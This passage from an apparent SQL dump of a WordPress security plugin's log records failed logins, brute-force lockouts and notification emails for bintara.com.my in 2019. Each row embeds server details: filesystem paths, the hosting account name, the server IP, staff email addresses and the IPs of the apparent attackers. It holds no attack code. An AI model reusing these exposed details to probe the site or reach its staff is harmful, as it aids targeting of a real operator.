om.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmqTDrcQxTmGrCWuaReQAAAco\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072809.6633\";s:12:\"REQUEST_TIME\";s:10:\"1569072809\";}}','notice','2019-09-21 13:33:31','2019-09-21 13:33:30',18313504,19609104,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'35.188.77.30'),(25966,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmsDDrcQxTmGrCWuaRfgAAAc8\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.60\";s:11:\"REMOTE_PORT\";s:5:\"37040\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmsDDrcQxTmGrCWuaRfgAAAc8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072816.7673\";s:12:\"REQUEST_TIME\";s:10:\"1569072816\";}}','notice','2019-09-21 13:33:38','2019-09-21 13:33:37',17800368,19290856,'https://bintara.com.my/blog/wp-login.php',1,0,'103.15.226.60'),(25967,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:33:37\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:33:37\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:48:37\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:48:37\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:33:38','2019-09-21 13:33:37',17885272,19290856,'https://bintara.com.my/blog/wp-login.php',1,0,'103.15.226.60'),(25968,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:33:38','2019-09-21 13:33:37',18091280,19290856,'https://bintara.com.my/blog/wp-login.php',1,0,'103.15.226.60'),(25969,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmsnkXpgmG5P@iB8kzYQAAAI4\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.60\";s:11:\"REMOTE_PORT\";s:5:\"37402\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmsnkXpgmG5P@iB8kzYQAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072818.5157\";s:12:\"REQUEST_TIME\";s:10:\"1569072818\";}}','notice','2019-09-21 13:33:39','2019-09-21 13:33:38',18313568,19610856,'https://bintara.com.my/blog/xmlrpc.php',1,0,'103.15.226.60'),(25970,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmy3kXpgmG5P@iB8kzbgAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"146.148.80.88\";s:11:\"REMOTE_PORT\";s:5:\"28998\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmy3kXpgmG5P@iB8kzbgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072843.3136\";s:12:\"REQUEST_TIME\";s:10:\"1569072843\";}}','notice','2019-09-21 13:34:04','2019-09-21 13:34:03',17793720,19285192,'https://bintara.com.my/blog/wp-login.php',1,0,'146.148.80.88'),(25971,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:34:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:34:03\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:49:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:49:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:34:04','2019-09-21 13:34:03',17878608,19285192,'https://bintara.com.my/blog/wp-login.php',1,0,'146.148.80.88'),(25972,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:34:04','2019-09-21 13:34:03',18084296,19285192,'https://bintara.com.my/blog/wp-login.php',1,0,'146.148.80.88'),(25973,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmzXkXpgmG5P@iB8kzbwAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"146.148.80.88\";s:11:\"REMOTE_PORT\";s:5:\"29542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmzXkXpgmG5P@iB8kzbwAAAIQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072845.8139\";s:12:\"REQUEST_TIME\";s:10:\"1569072845\";}}','notice','2019-09-21 13:34:07','2019-09-21 13:34:06',18313568,19610856,'https://bintara.com.my/blog/xmlrpc.php',1,0,'146.148.80.88'),(25974,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYm-jDrcQxTmGrCWuaR9QAAAdQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.49.140\";s:11:\"REMOTE_PORT\";s:5:\"50710\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYm-jDrcQxTmGrCWuaR9QAAAdQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072894.6158\";s:12:\"REQUEST_TIME\";s:10:\"1569072894\";}}','notice','2019-09-21 13:34:56','2019-09-21 13:34:55',17795680,19286672,'https://bintara.com.my/test/wp-login.php',1,0,'142.93.49.140'),(23660,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"176.31.117.193\";s:11:\"REMOTE_PORT\";s:5:\"45826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXDtigKaMOZt7YA-EMx2VwAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567681930.993\";s:12:\"REQUEST_TIME\";s:10:\"1567681930\";}}','notice','2019-09-05 11:12:13','2019-09-05 11:12:11',18206192,19503848,'https://bintara.com.my/xmlrpc.php',1,0,'176.31.117.193'),(23661,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.105.41\";s:11:\"REMOTE_PORT\";s:5:\"60928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXEWjN7XyeFCbG-KWI7MogAAAFM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567692428.5164\";s:12:\"REQUEST_TIME\";s:10:\"1567692428\";}}','notice','2019-09-05 14:07:09','2019-09-05 14:07:08',17692872,19183072,'https://bintara.com.my/wp-login.php',1,0,'167.71.105.41'),(23662,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 